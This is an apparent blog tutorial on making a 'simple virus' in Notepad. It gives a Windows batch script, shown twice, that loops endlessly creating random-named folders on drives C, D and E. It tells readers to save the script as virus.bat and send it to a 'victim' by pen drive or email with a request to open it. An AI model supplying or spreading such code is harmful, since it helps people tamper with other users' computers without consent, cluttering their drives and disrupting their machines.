Here we are going to show, How to make Simple Virus in notepad.
We will Create a Virus
We will Check it on Victims Computer.
[ Note : Don't try it on your computer ]
Open your notepad from [Start >> Run >> Type "Notepad" >>Press Enter ]
Copy the Following Code and paste it in notepad then Save it as "virus.bat". [you can also save with different name but extension must be .bat]
@echo off
:VIRUS
cd /d C:
md %RANDOM%
cd /d D:
md %RANDOM%
cd /d E:
md %RANDOM%
goto VIRUS
REM #######################
REM softwareforfre.blogspot.com
We will Create a Virus
We will Check it on Victims Computer.
[ Note : Don't try it on your computer ]
Open Notepad and Copy the Following code in Notepad.
Open your notepad from [Start >> Run >> Type "Notepad" >>Press Enter ]
Copy the Following Code and paste it in notepad then Save it as "virus.bat". [you can also save with different name but extension must be .bat]
@echo off
:VIRUS
cd /d C:
md %RANDOM%
cd /d D:
md %RANDOM%
cd /d E:
md %RANDOM%
goto VIRUS
REM #######################
REM softwareforfre.blogspot.com
Give it to Victim
Now Give this file to Victim via Pen-drive or Mail then ask to Open it.
It will Create More Folder in C,D,and E drive.
It will Create More Folder in C,D,and E drive.
Comments
Post a Comment